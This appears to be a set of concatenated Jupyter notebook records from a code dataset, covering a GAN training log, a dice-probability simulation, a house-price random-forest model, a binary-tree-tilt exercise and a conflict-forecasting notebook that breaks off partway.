-0.2381\tLoss_G: 0.3870\tD(x): 1.1174\tD(G(z)): 0.7718 / 0.3870 \t FID: 0.3206\n[17/40][50/128]\tLoss_D: -0.4271\tLoss_G: 0.3572\tD(x): 1.1475\tD(G(z)): 0.6909 / 0.3572 \t FID: 0.3271\n[17/40][100/128]\tLoss_D: -0.3382\tLoss_G: 0.2700\tD(x): 1.1951\tD(G(z)): 0.8256 / 0.2700 \t FID: 0.3538\n[18/40][0/128]\tLoss_D: -0.2817\tLoss_G: 0.2456\tD(x): 1.1362\tD(G(z)): 0.8233 / 0.2456 \t FID: 0.4165\n[18/40][50/128]\tLoss_D: -0.3541\tLoss_G: 0.2961\tD(x): 1.2472\tD(G(z)): 0.8478 / 0.2961 \t FID: 0.3249\n[18/40][100/128]\tLoss_D: -0.3325\tLoss_G: 0.3214\tD(x): 1.1710\tD(G(z)): 0.7807 / 0.3214 \t FID: 0.3854\n[19/40][0/128]\tLoss_D: -0.3153\tLoss_G: 0.3444\tD(x): 1.1702\tD(G(z)): 0.8186 / 0.3444 \t FID: 0.3605\n[19/40][50/128]\tLoss_D: -0.3587\tLoss_G: 0.2783\tD(x): 1.1862\tD(G(z)): 0.7849 / 0.2783 \t FID: 0.3132\n[19/40][100/128]\tLoss_D: -0.4079\tLoss_G: 0.1898\tD(x): 1.2344\tD(G(z)): 0.7895 / 0.1898 \t FID: 0.3365\n[20/40][0/128]\tLoss_D: -0.4054\tLoss_G: 0.2265\tD(x): 1.2273\tD(G(z)): 0.7953 / 0.2265 \t FID: 0.3789\n[20/40][50/128]\tLoss_D: -0.3293\tLoss_G: 0.2546\tD(x): 1.2432\tD(G(z)): 0.8731 / 0.2546 \t FID: 0.3089\n[20/40][100/128]\tLoss_D: -0.3449\tLoss_G: 0.2628\tD(x): 1.1889\tD(G(z)): 0.7839 / 0.2628 \t FID: 0.3263\n[21/40][0/128]\tLoss_D: -0.4392\tLoss_G: 0.2488\tD(x): 1.2352\tD(G(z)): 0.7601 / 0.2488 \t FID: 0.3242\n[21/40][50/128]\tLoss_D: -0.3790\tLoss_G: 0.2132\tD(x): 1.2167\tD(G(z)): 0.8073 / 0.2132 \t FID: 0.2980\n[21/40][100/128]\tLoss_D: -0.3664\tLoss_G: 0.1449\tD(x): 1.2348\tD(G(z)): 0.8400 / 0.1449 \t FID: 0.3017\n[22/40][0/128]\tLoss_D: -0.3343\tLoss_G: 0.2877\tD(x): 1.1457\tD(G(z)): 0.7817 / 0.2877 \t FID: 0.3424\n[22/40][50/128]\tLoss_D: -0.3231\tLoss_G: 0.3253\tD(x): 1.2250\tD(G(z)): 0.8601 / 0.3253 \t FID: 0.3276\n[22/40][100/128]\tLoss_D: -0.4138\tLoss_G: 0.2920\tD(x): 1.2569\tD(G(z)): 0.8078 / 0.2920 \t FID: 0.3085\n[23/40][0/128]\tLoss_D: -0.3617\tLoss_G: 0.1707\tD(x): 1.2202\tD(G(z)): 0.8323 / 0.1707 \t FID: 0.3111\n[23/40][50/128]\tLoss_D: 
-0.3485\tLoss_G: 0.3286\tD(x): 1.2656\tD(G(z)): 0.8886 / 0.3286 \t FID: 0.3264\n[23/40][100/128]\tLoss_D: -0.4028\tLoss_G: 0.3426\tD(x): 1.1970\tD(G(z)): 0.7672 / 0.3426 \t FID: 0.3034\n[24/40][0/128]\tLoss_D: -0.3470\tLoss_G: 0.2099\tD(x): 1.1932\tD(G(z)): 0.8190 / 0.2099 \t FID: 0.3068\n[24/40][50/128]\tLoss_D: -0.4301\tLoss_G: 0.2193\tD(x): 1.2872\tD(G(z)): 0.8259 / 0.2193 \t FID: 0.3212\n[24/40][100/128]\tLoss_D: -0.3975\tLoss_G: 0.3110\tD(x): 1.2402\tD(G(z)): 0.8225 / 0.3110 \t FID: 0.3387\n[25/40][0/128]\tLoss_D: -0.4245\tLoss_G: 0.2177\tD(x): 1.2898\tD(G(z)): 0.8275 / 0.2177 \t FID: 0.3069\n[25/40][50/128]\tLoss_D: -0.3522\tLoss_G: 0.2345\tD(x): 1.2358\tD(G(z)): 0.8569 / 0.2345 \t FID: 0.3078\n[25/40][100/128]\tLoss_D: -0.4086\tLoss_G: 0.3019\tD(x): 1.2334\tD(G(z)): 0.7952 / 0.3019 \t FID: 0.3112\n[26/40][0/128]\tLoss_D: -0.3904\tLoss_G: 0.3969\tD(x): 1.2020\tD(G(z)): 0.7810 / 0.3969 \t FID: 0.3108\n[26/40][50/128]\tLoss_D: -0.4111\tLoss_G: 0.2443\tD(x): 1.2469\tD(G(z)): 0.8016 / 0.2443 \t FID: 0.3282\n[26/40][100/128]\tLoss_D: -0.2611\tLoss_G: 0.3328\tD(x): 1.1236\tD(G(z)): 0.8372 / 0.3328 \t FID: 0.3066\n[27/40][0/128]\tLoss_D: -0.3914\tLoss_G: 0.1809\tD(x): 1.2323\tD(G(z)): 0.8135 / 0.1809 \t FID: 0.3031\n[27/40][50/128]\tLoss_D: -0.3794\tLoss_G: 0.2126\tD(x): 1.2738\tD(G(z)): 0.8648 / 0.2126 \t FID: 0.3208\n[27/40][100/128]\tLoss_D: -0.3305\tLoss_G: 0.2578\tD(x): 1.2542\tD(G(z)): 0.8535 / 0.2578 \t FID: 0.2982\n[28/40][0/128]\tLoss_D: -0.4107\tLoss_G: 0.2669\tD(x): 1.2584\tD(G(z)): 0.8192 / 0.2669 \t FID: 0.2980\n[28/40][50/128]\tLoss_D: -0.3026\tLoss_G: 0.2515\tD(x): 1.1921\tD(G(z)): 0.8578 / 0.2515 \t FID: 0.3030\n[28/40][100/128]\tLoss_D: -0.4441\tLoss_G: 0.1938\tD(x): 1.2544\tD(G(z)): 0.7909 / 0.1938 \t FID: 0.2937\n[29/40][0/128]\tLoss_D: -0.3783\tLoss_G: 0.2872\tD(x): 1.1795\tD(G(z)): 0.7793 / 0.2872 \t FID: 0.3167\n[29/40][50/128]\tLoss_D: -0.3567\tLoss_G: 0.3442\tD(x): 1.1832\tD(G(z)): 0.7938 / 0.3442 \t FID: 0.3339\n[29/40][100/128]\tLoss_D: 
-0.3105\tLoss_G: 0.2682\tD(x): 1.2503\tD(G(z)): 0.9122 / 0.2682 \t FID: 0.3007\n[30/40][0/128]\tLoss_D: -0.3972\tLoss_G: 0.2933\tD(x): 1.1817\tD(G(z)): 0.7514 / 0.2933 \t FID: 0.3145\n[30/40][50/128]\tLoss_D: -0.2908\tLoss_G: 0.2981\tD(x): 1.1780\tD(G(z)): 0.8653 / 0.2981 \t FID: 0.3032\n[30/40][100/128]\tLoss_D: -0.3221\tLoss_G: 0.2399\tD(x): 1.1748\tD(G(z)): 0.8264 / 0.2399 \t FID: 0.3150\n[31/40][0/128]\tLoss_D: -0.3319\tLoss_G: 0.3256\tD(x): 1.1801\tD(G(z)): 0.8188 / 0.3256 \t FID: 0.3078\n[31/40][50/128]\tLoss_D: -0.3927\tLoss_G: 0.2671\tD(x): 1.2335\tD(G(z)): 0.8081 / 0.2671 \t FID: 0.2870\n[31/40][100/128]\tLoss_D: -0.3562\tLoss_G: 0.3183\tD(x): 1.1999\tD(G(z)): 0.8218 / 0.3183 \t FID: 0.3013\n[32/40][0/128]\tLoss_D: -0.3709\tLoss_G: 0.3335\tD(x): 1.1660\tD(G(z)): 0.7715 / 0.3335 \t FID: 0.3022\n[32/40][50/128]\tLoss_D: -0.3525\tLoss_G: 0.3520\tD(x): 1.1353\tD(G(z)): 0.7580 / 0.3520 \t FID: 0.3003\n[32/40][100/128]\tLoss_D: -0.4976\tLoss_G: 0.2441\tD(x): 1.2468\tD(G(z)): 0.7190 / 0.2441 \t FID: 0.2910\n[33/40][0/128]\tLoss_D: -0.3484\tLoss_G: 0.2995\tD(x): 1.1673\tD(G(z)): 0.7810 / 0.2995 \t FID: 0.2982\n[33/40][50/128]\tLoss_D: -0.3902\tLoss_G: 0.2780\tD(x): 1.1573\tD(G(z)): 0.7434 / 0.2780 \t FID: 0.2996\n[33/40][100/128]\tLoss_D: -0.3121\tLoss_G: 0.3379\tD(x): 1.1119\tD(G(z)): 0.7784 / 0.3379 \t FID: 0.3166\n[34/40][0/128]\tLoss_D: -0.4164\tLoss_G: 0.2748\tD(x): 1.2527\tD(G(z)): 0.8128 / 0.2748 \t FID: 0.3130\n[34/40][50/128]\tLoss_D: -0.3157\tLoss_G: 0.3652\tD(x): 1.0971\tD(G(z)): 0.7529 / 0.3652 \t FID: 0.3155\n[34/40][100/128]\tLoss_D: -0.3906\tLoss_G: 0.2942\tD(x): 1.2324\tD(G(z)): 0.8163 / 0.2942 \t FID: 0.3077\n[35/40][0/128]\tLoss_D: -0.3360\tLoss_G: 0.3278\tD(x): 1.1854\tD(G(z)): 0.8182 / 0.3278 \t FID: 0.3482\n[35/40][50/128]\tLoss_D: -0.2552\tLoss_G: 0.2907\tD(x): 1.1489\tD(G(z)): 0.8635 / 0.2907 \t FID: 0.2887\n[35/40][100/128]\tLoss_D: -0.4143\tLoss_G: 0.3390\tD(x): 1.1955\tD(G(z)): 0.7591 / 0.3390 \t FID: 0.3018\n[36/40][0/128]\tLoss_D: 
-0.3928\tLoss_G: 0.3734\tD(x): 1.1992\tD(G(z)): 0.7826 / 0.3734 \t FID: 0.3233\n[36/40][50/128]\tLoss_D: -0.3361\tLoss_G: 0.3454\tD(x): 1.1456\tD(G(z)): 0.7817 / 0.3454 \t FID: 0.3094\n[36/40][100/128]\tLoss_D: -0.3571\tLoss_G: 0.2888\tD(x): 1.1501\tD(G(z)): 0.7714 / 0.2888 \t FID: 0.2918\n[37/40][0/128]\tLoss_D: -0.3758\tLoss_G: 0.2855\tD(x): 1.1462\tD(G(z)): 0.7415 / 0.2855 \t FID: 0.3042\n[37/40][50/128]\tLoss_D: -0.4472\tLoss_G: 0.3748\tD(x): 1.2322\tD(G(z)): 0.7588 / 0.3748 \t FID: 0.2959\n[37/40][100/128]\tLoss_D: -0.3120\tLoss_G: 0.2750\tD(x): 1.1580\tD(G(z)): 0.8154 / 0.2750 \t FID: 0.3206\n[38/40][0/128]\tLoss_D: -0.4149\tLoss_G: 0.2868\tD(x): 1.2133\tD(G(z)): 0.7768 / 0.2868 \t FID: 0.3009\n[38/40][50/128]\tLoss_D: -0.3588\tLoss_G: 0.3843\tD(x): 1.1442\tD(G(z)): 0.7632 / 0.3843 \t FID: 0.3159\n[38/40][100/128]\tLoss_D: -0.4442\tLoss_G: 0.3222\tD(x): 1.1932\tD(G(z)): 0.7224 / 0.3222 \t FID: 0.3413\n[39/40][0/128]\tLoss_D: -0.4036\tLoss_G: 0.2769\tD(x): 1.1629\tD(G(z)): 0.7320 / 0.2769 \t FID: 0.3020\n[39/40][50/128]\tLoss_D: -0.3741\tLoss_G: 0.2689\tD(x): 1.1603\tD(G(z)): 0.7609 / 0.2689 \t FID: 0.3104\n[39/40][100/128]\tLoss_D: -0.4118\tLoss_G: 0.3319\tD(x): 1.2086\tD(G(z)): 0.7641 / 0.3319 \t FID: 0.3308\n" ], [ "plt.figure(figsize=(10,5))\nplt.title(\"Generator and Discriminator Loss During Training\")\nplt.plot(G_losses,label=\"G\")\nplt.plot(D_losses,label=\"D\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.show()", "_____no_output_____" ], [ "plt.figure(figsize=(10,5))\nplt.title(\"Frechet Inception Distance\")\nplt.plot(Score)\nplt.xlabel(\"iterations\")\nplt.ylabel(\"FID\")\nplt.show()", "_____no_output_____" ] ], [ [ "## Results", "_____no_output_____" ] ], [ [ "device = torch.device(\"cpu\")\nnetG.to(device)\nnetG.eval()\nnetG.requires_grad_(False)", "_____no_output_____" ], [ "num_examples_to_generate = 128*128\n#Generate u \nmanualSeed = random.randint(1, 10000) # use if you want new 
results\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\nnoise = torch.randn(num_examples_to_generate,nz,128, device=device)\nu_gen = netG(noise,128)\nu_gen = u_gen.cpu().detach().numpy()", "_____no_output_____" ], [ "plt.ylabel('u (m/s')\nplt.xlabel('z (m)')\nz = lz*np.linspace(0,1,128)\nplt.plot(z,u_gen[np.random.randint(low=0,high=num_examples_to_generate),0,:],'r')", "_____no_output_____" ], [ "Ruu_gen = auto_cor(torch.tensor(u_gen[:,0,:]))\nplt.xlabel('z/lz')\nplt.ylabel('Ruu')\ndz = np.linspace(-1,1,255)\nplt.plot(dz,Ruu_gen,'r--')\nplt.plot(dz,Ruu)", "_____no_output_____" ], [ "wave_numbers, E_gen = spec(torch.tensor(u_gen),lx)\nE_gen = E_gen.mean(dim=0)\nplt.xscale('log')\nplt.yscale('log')\nplt.xlabel('k')\nplt.ylabel('E(k)')\nplt.plot(wave_numbers_gen,E_gen.detach(),'r--')\nplt.plot(wave_numbers,E.cpu().detach())", "_____no_output_____" ], [ "print(torch.mean(torch.tensor(u_gen)))\nprint(torch.std(torch.tensor(u_gen)))", "tensor(-0.0028)\ntensor(0.2065)\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
e730df1b5ce7228b31539a454ddb6aefdf0b5689
1,326
ipynb
Jupyter Notebook
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
1
2018-08-01T15:54:59.000Z
2018-08-01T15:54:59.000Z
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
null
null
null
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
null
null
null
30.136364
385
0.63273
[ [ [ "*Thrill. Passion. Excitement. These are not the emotions you feel when you see a ticket with a bug report. You mark it as a boring task at the moment you read it and your procrastination obligingly provide you with a list of distractions you can use to avoid it.*\n\n*I used to feel like that. But soon I understood that each bug is a complex and unique story much more surprising than any crime novel. I never know how it ends, but what I know for sure, it will be interesting. Now hunting bugs is a sort of my own detective agency with murders, victims, alibis, and evidence. And the murderer is usually is my colleague (or even I am myself).* ", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e730e9a7f15346718759db15fa3492d3f2b9c798
238,025
ipynb
Jupyter Notebook
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
1
2021-05-07T04:35:46.000Z
2021-05-07T04:35:46.000Z
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
null
null
null
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
null
null
null
1,101.967593
233,764
0.956072
[ [ [ "import torch\nimport random\nimport numpy as np\n\nfrom torch.distributions import multinomial", "_____no_output_____" ], [ "fair_probs = [1.0/6] * 6\nfair_probs", "_____no_output_____" ], [ "np.random.multinomial(1, fair_probs)", "_____no_output_____" ], [ "np.random.multinomial(10, fair_probs)", "_____no_output_____" ], [ "counts = np.random.multinomial(1000, fair_probs).astype(np.float32)\ncounts / 1000", "_____no_output_____" ], [ "import matplotlib.pyplot as plt\n\ncounts = np.random.multinomial(10, fair_probs, size=500)\ncum_counts = counts.astype(np.float32).cumsum(axis=0)\nestimates = cum_counts / cum_counts.sum(axis=1, keepdims=True)\n\nplt.figure(figsize=(6, 4.5), dpi=300)\nfor i in range(6):\n plt.plot(estimates[:, i],\n label=(\"P(die=\" + str(i + 1) + \")\"))\n \nplt.axhline(y=0.167, color='black', linestyle='dashed')\nplt.gca().set_xlabel('Groups of experiments')\nplt.gca().set_ylabel('Estimated probability')\nplt.legend();", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e730eec23a5e0a76a212b978d1c98d1c59507de6
10,477
ipynb
Jupyter Notebook
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
27.716931
215
0.508829
[ [ [ "import import_ipynb\nfrom Helpers import *\nimport pandas as pd\nimport numpy as np\nimport sklearn\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import make_pipeline, Pipeline\n\nfrom sklearn.model_selection import cross_val_score, GridSearchCV,cross_val_predict\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import MinMaxScaler", "importing Jupyter notebook from Helpers.ipynb\n" ], [ "train = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\ntest_ids = test['Id']", "_____no_output_____" ], [ "\n\n\n# class HomePreprocessor:\n# def __init__(self, drop_low_correlated=False):\n# self.drop_low_correlated = drop_low_correlated\n\n# def fit(self, X, y=None):\n# return self\n\n# def transform(self, X, *_):\n\n# if (drop_low_correlated):\n# X=X.pipe(drop_non_correlated_columns, min_corr=ignoreUncorrelatedRate)\n \n# df = df.pipe(drop_columns, columns=high_nan_columns) # high number of NA values \n# .pipe(drop_columns, columns=no_variety_columns) # no variety\n\n# .pipe(fill_NA, columns=columnsToFillNone, value='None') # \n# .pipe(fill_NA, columns=columnsToFillZero, value=0) # \n# .pipe(get_dummies_for_category_columns, columns=X.columns[X.dtypes==\"object\"])\n# .pipe(get_dummies_for_category_columns, columns=categoryColumns2)\n# .pipe(set_type, 'MasVnrArea','int64')\n# .pipe(year_to_age, 'YearBuilt')\n# .pipe(year_to_age, 'YearRemodAdd')\n# .pipe(year_to_age, 'YrSold')\n# .pipe(drop_columns, columns=[\"Id\",\"BedroomAbvGr\"])## drop Garbage\n# .pipe(log_tranform, columns=areaColumns) \n# return X\n\n# train = preprocess(train).pipe(drop_non_correlated_columns, min_corr=ignoreUncorrelatedRate) \n# test_ids=test['Id']\n# test = preprocess(test)\n", "_____no_output_____" ], [ "\ny_train = np.log(train['SalePrice'])\n#y_test = np.log(test['SalePrice'])\n\ncs = ColumnSelector(columns=['GrLivArea', 'YearBuilt', 'OverallQual','MSSubClass'])\ndt = DummiesTransformer(column='MSSubClass', keys=[ 
20, 30, 40, 45, 50, 60, 70, 75, 80, 85, 90, 120, 150, 160, 180, 190])\npp = Pipeline(\n [('SelectColumns', cs),('Dummies', dt)])\nX_train = pp.fit_transform(train)\nX_test = pp.fit_transform(test)\n\n\n\n# Perform Grid-Search\ngsc = GridSearchCV(\n estimator=RandomForestRegressor(),\n param_grid={\n 'max_depth': range(8,10),\n 'n_estimators': ( 50, 100, 1000, 2000),\n },\n cv=5, scoring='neg_mean_squared_error', verbose=0, n_jobs=-1)\n\ngrid_result = gsc.fit(X_train, y_train)\nbest_params = grid_result.best_params_\nprint(best_params)\nrfr = RandomForestRegressor(max_depth=best_params[\"max_depth\"], n_estimators=best_params[\"n_estimators\"],\n random_state=False, verbose=False)\n\n\nscores = cross_val_score(rfr, X_train, y_train, cv=10, scoring='neg_mean_squared_error')\nprint(scores)", "/Users/drmegavolt/miniconda3/envs/home_iowa/lib/python3.7/site-packages/sklearn/base.py:553: FutureWarning: specifying 'categories' or 'ordered' in .astype() is deprecated; pass a CategoricalDtype instead\n return self.fit(X, **fit_params).transform(X)\nHelpers.ipynb:89: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n \"\\n\",\n" ], [ "#sklearn.metrics.SCORERS.keys()\nrfr.fit(X_train, y_train)\npredictions = rfr.predict( X_test)", "_____no_output_____" ], [ "result=np.exp(predictions)", "_____no_output_____" ], [ "result", "_____no_output_____" ], [ "dfR = pd.DataFrame(test_ids,columns=['Id'])\ndfR['SalePrice']=result\ndfR.to_csv('predictions.csv',index = None, header=True)\nprint(dfR.head())", " Id SalePrice\n0 1461 124001.319589\n1 1462 152603.917946\n2 1463 166300.380937\n3 1464 181007.865275\n4 1465 202710.594751\n" ], [ "test.columns[test.isnull().sum()>0]", "_____no_output_____" ], [ "test['MiscFeature'].unique()", "_____no_output_____" ], [ 
"(test['BsmtFullBath']+0.5*test.BsmtHalfBath).isnull()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730f139847546fc35781e222aa82025ff42f54d
3,556
ipynb
Jupyter Notebook
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/Leetcode
90d904dde125dd35ee256a7f383961786f1ada5d
[ "Apache-2.0" ]
1
2020-08-05T11:47:47.000Z
2020-08-05T11:47:47.000Z
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/LeetCode
b9e5de69b4e4d794aff89497624f558343e362ad
[ "Apache-2.0" ]
null
null
null
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/LeetCode
b9e5de69b4e4d794aff89497624f558343e362ad
[ "Apache-2.0" ]
null
null
null
24.867133
62
0.412261
[ [ [ "说明:\n 给定一个二叉树,计算整个树的坡度。\n 一个树的节点的坡度定义即为:\n 该节点左子树的结点之和和右子树结点之和的差的绝对值。空结点的的坡度是0。\n 整个树的坡度就是其所有节点的坡度之和。\n\n示例:\n 输入:\n 1\n / \\\n 2 3\n 输出:1\n 解释:\n 结点 2 的坡度: 0\n 结点 3 的坡度: 0\n 结点 1 的坡度: |2-3| = 1\n 树的坡度 : 0 + 0 + 1 = 1\n \n提示:\n 1、任何子树的结点的和不会超过 32 位整数的范围。\n 2、坡度的值不会超过 32 位整数的范围。", "_____no_output_____" ] ], [ [ "def __init__(self):\n self.tilt = 0\n\ndef findTilt(self, root: TreeNode) -> int:\n # null node equals to node whose value is 0\n self.calc(root)\n return self.tilt\n\ndef calc(self, root):\n if not root:\n return 0\n\n l = r = 0\n if root.left:\n l = self.calc(root.left)\n if root.right:\n r = self.calc(root.right)\n\n self.tilt += abs(l-r)\n return l + r + root.va", "_____no_output_____" ], [ "class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \nclass Solution:\n def findTilt(self, root: TreeNode) -> int:\n tree_tilt = 3\n \n def dfs(node):\n nonlocal tree_tilt\n \n if not root:\n return 0\n l = r = 0\n if root.left:\n l = self.dfs(root.left)\n if root.right:\n r = self.dfs(root.right)\n tree_tilt += abs(l - r)\n \n dfs(root)\n return tree_tilt ", "_____no_output_____" ], [ "class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def findTilt(self, root: TreeNode) -> int:\n self.tree_tilt = 0\n self.dfs(root)\n return self.tree_tilt\n \n def dfs(self, root):\n if not root:\n return 0\n l = r = 0\n if root.left:\n l = self.dfs(root.left)\n if root.right:\n r = self.dfs(root.right)\n self.tree_tilt += abs(l - r)\n return l + r + root.val", "_____no_output_____" ] ] ]
[ "raw", "code" ]
[ [ "raw" ], [ "code", "code", "code" ] ]
e730f98236418f73b6c3f9369b3297fc4e9ca304
28,168
ipynb
Jupyter Notebook
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
39.45098
145
0.490486
[ [ [ "# High Resolution Conflict Forecasting with Spatial Convolutions and Long Short-Term Memory\n\n## Replication Archive\n\n[Benjamin J. Radford](https://www.benradford.com) \nAssistant Professor \nUNC Charlotte \[email protected] \n\nThis file produces all necessary data for the feature dropout study. \n\n**Warning:** This file may take several days to run depending on your computer's speed.\n\n## Imports and seeds", "_____no_output_____" ] ], [ [ "import sys\nimport os\nimport gc\nimport logging\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom joblib import dump, load\n\nfrom itertools import product\nfrom math import isnan\n\nimport views\nfrom views import Period, Model, Downsampling\nfrom views.utils.data import assign_into_df\nfrom views.apps.transforms import lib as translib\nfrom views.apps.evaluation import lib as evallib, feature_importance as fi\nfrom views.apps.model import api\nfrom views.apps.extras import extras\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, ConvLSTM2D, Activation, Conv3D, BatchNormalization, Dropout, Bidirectional, GaussianNoise\nfrom keras import optimizers\n\nimport tensorflow as tf\n\nimport random\nimport geoplot as gplt\nimport contextily as ctx\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import AxesGrid\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom numpy.random import seed\nseed(1234)\ntf.random.set_seed(1234)\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\npgid_groupa = [149426,149427,149428,149429,149430, 148706,148707,148708,148709,148710, 147986,\n147987,147988,147989,147990, 147266,147267,147268,147269,147270, 146546,146547,146548,\n146549,146550]\n\npgid_groupb = [114918,114919,114920,114921,114922, 114198,114199,114200,114201,114202, 113478,\n113479,113480,113481,113482, 112758,112759,112760,112761,112762, 
112038,112039,112040,\n112041,112042]\n\ncols_feats = [\n \"ln_ged_best_sb\",\n \"pgd_bdist3\",\n \"pgd_capdist\",\n \"pgd_agri_ih\",\n \"pgd_pop_gpw_sum\",\n \"pgd_ttime_mean\",\n \"spdist_pgd_diamsec\",\n \"pgd_pasture_ih\",\n \"pgd_savanna_ih\",\n \"pgd_forest_ih\",\n \"pgd_urban_ih\",\n \"pgd_barren_ih\",\n \"pgd_gcp_mer\"\n]\n\n\n\nmodel = keras.models.load_model(\"../../supplemental_data/competition_model/model_competition_entry.h5\")\n\nmodel.summary()\n\ngc.collect()", "_____no_output_____" ], [ "# Do you wish to fetch the latest public data? If so, change False to True and run this cell\n# Cells below will fail if this is not run if you haven't imported data yourself yet.\n\nredownload_data = False\n\nif redownload_data:\n path_zip = views.apps.data.public.fetch_latest_zip_from_website(path_dir_destination=views.DIR_SCRATCH)\n views.apps.data.public.import_tables_and_geoms(tables=views.TABLES, geometries=views.GEOMETRIES, path_zip=path_zip)\n\ndataset = views.DATASETS[\"pgm_africa_imp_0\"]\ndf = dataset.gdf\ndf.reset_index(inplace=True)\n\nupdate = pd.read_csv(\"../../data/pgm.csv\")\ndf = pd.merge(df[[\"geom\",\"pg_id\",\"month_id\"]], update, on=[\"pg_id\",\"month_id\"])\n\ndf = df.loc[(df[\"year\"]<2021) & (df[\"year\"]>1989)]\ndf = df.loc[(df[\"year\"]<2020) | (df[\"month\"]<9)]\ndf[\"coordx\"] = df[\"geom\"].apply(lambda x: x.centroid.x)\ndf[\"coordy\"] = df[\"geom\"].apply(lambda y: y.centroid.y)\ndf[\"col_idx\"] = [int(a) for a in list((df[\"coordx\"] - df[\"coordx\"].min())*2)]\ndf[\"row_idx\"] = [int(a) for a in list((df[\"coordy\"] - df[\"coordy\"].min())*2)]\ndf[\"year_idx\"] = [int(a) for a in list((df[\"year\"] - df[\"year\"].min()))]\ndf[\"month_idx\"] = [int(a) for a in list((df[\"month\"] - df[\"month\"].min()))]\ndf[\"year_month_idx\"] = [int(a) for a in list((df[\"month_id\"] - df[\"month_id\"].min()))]\n\ndf.drop(\"geom\", inplace=True, axis=1)\n\n\n##\n## Make Lags\n##\ndf1 = 
df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf2 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf3 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf4 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf5 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf6 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf7 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\n\ndf1[\"year_month_idx\"] = df1[\"year_month_idx\"]+1\ndf2[\"year_month_idx\"] = df2[\"year_month_idx\"]+2\ndf3[\"year_month_idx\"] = df3[\"year_month_idx\"]+3\ndf4[\"year_month_idx\"] = df4[\"year_month_idx\"]+4\ndf5[\"year_month_idx\"] = df5[\"year_month_idx\"]+5\ndf6[\"year_month_idx\"] = df6[\"year_month_idx\"]+6\ndf7[\"year_month_idx\"] = 